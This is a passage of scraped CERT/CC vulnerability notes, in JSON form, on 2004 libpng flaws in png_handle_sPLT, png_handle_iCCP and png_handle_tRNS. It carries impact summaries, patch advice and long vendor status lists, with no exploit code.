Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-01 20:45 UTC \n**Document Revision: ** | 18 \n", "modified": "2005-06-01T20:45:00", "published": "2004-08-04T00:00:00", "id": "VU:477512", "href": "https://www.kb.cert.org/vuls/id/477512", "type": "cert", "title": "libpng png_handle_sPLT() integer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-04T23:47:23", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability that could cause affected applications to crash.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nUnder some circumstances, a null pointer may be dereferenced during a memory allocation in the `png_handle_iCCP()` function. As a result, a PNG file with particular characteristics could cause the affected application to crash. Similar errors are reported to exist in other locations within libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nAn attacker could cause a vulnerable application to crash by supplying a specially crafted PNG image. Vulnerable applications that read images from network sources could be exploited remotely. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n236656\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Debian Linux Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Hewlett-Packard Company Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Mandriva, Inc. Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMandrakeSoft has published Mandrake Security Advisory [MDKSA-2004:079](<http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### MontaVista Software, Inc. Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Red Hat, Inc. Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SUSE Linux Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sun Microsystems, Inc. Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Hitachi Not Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Berkeley Software Design, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### FreeBSD, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM Corporation Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM-zSeries Unknown\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Immunix Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Ingrian Networks, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Novell, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sequent Computer Systems, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Wind River Systems, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0598](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0598>) \n---|--- \n**Severity Metric:** | 1.05 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2007-07-21 02:33 UTC \n**Document Revision: ** | 17 \n", "modified": "2007-07-21T02:33:00", "published": "2004-08-04T00:00:00", "id": "VU:236656", "href": "https://www.kb.cert.org/vuls/id/236656", "type": "cert", "title": "libpng png_handle_iCCP() NULL pointer dereference", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:45", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599", "CVE-2004-0743", "CVE-2004-0744"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability, which could lead to arbitrary code execution on an affected system.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format. \n\nAccording to the PNG [Chunk Specification](<http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html>), PNG images contain a series of chunks including the IHDR, IDAT, and IEND chunks. In addition to these required chunks, a PNG image may contain one or more optional chunks. The optional tRNS chunk is responsible for specifying images that use simple transparency. There are several components of the tRNS chunk. If the PLTE block is not present in a tRNS chunk, a logic error in the code responsible for validating the data segments of the tRNS chunk may lead to a buffer overflow condition. \n \nThe buffer overflow vulnerability occurs in the `png_handle_tRNS()` function, which is responsible for ensuring that PNG images are formatted properly. When processing malformed PNG images, this function may fail to properly validate the length of the transparency chunk (tRNS) data. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \nPlease note that this vulnerability is known to exist in Microsoft Windows Messenger and MSN Messenger. Please see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) for more details. For information regarding how this vulnerability affects Microsoft Internet Explorer, refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \n### Impact \n\nBy introducing a malformed PNG image to a vulnerable application, a remote attacker could cause the application to crash or potentially execute arbitrary code with the privileges of the current user. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n388984\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: July 16, 2004 Updated: May 17, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \n================== \n \nComponent: Safari \nCVE ID: CAN-2004-0743 \nImpact: In a special situation, navigation using the forward/backward \nbuttons can re-send form data to a GET url. \n \nDescription: This is for a situation where a web form is sent to a \nserver using a POST method which issues an HTTP redirect to a GET \nmethod url. Using the forward/backward buttons will cause Safari to \nre-POST the form data to the GET url. Safari has been modified so \nthat in this situation forward/backward navigation will result in only \na GET method. \n \n================== \n \nComponent: TCP/IP Networking \nCVE ID: CAN-2004-0744 \nImpact: Maliciously crafted IP fragments can use too many system \nresources preventing normal network operation. \n \nDescription: The \"Rose Attack\" describes a specially constructed \nsequence of IP fragments designed to consume system resources. The \nTCP/IP implementation has been modified to limit the resources \nconsumed and prevents this denial of service attack. \n \n================================================ \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/> \n \nInformation will also be posted to the Apple Product Security \nweb site: \n<http://www.apple.com/support/security/security_updates.html> \n \nThis message is signed with Apple's Product Security PGP key, \nand details are available at: \n<http://www.apple.com/support/security/security_pgp.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: July 16, 2004 Updated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) and [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) for information concerning this vulnerability and its remediation.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### MontaVista Software Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this 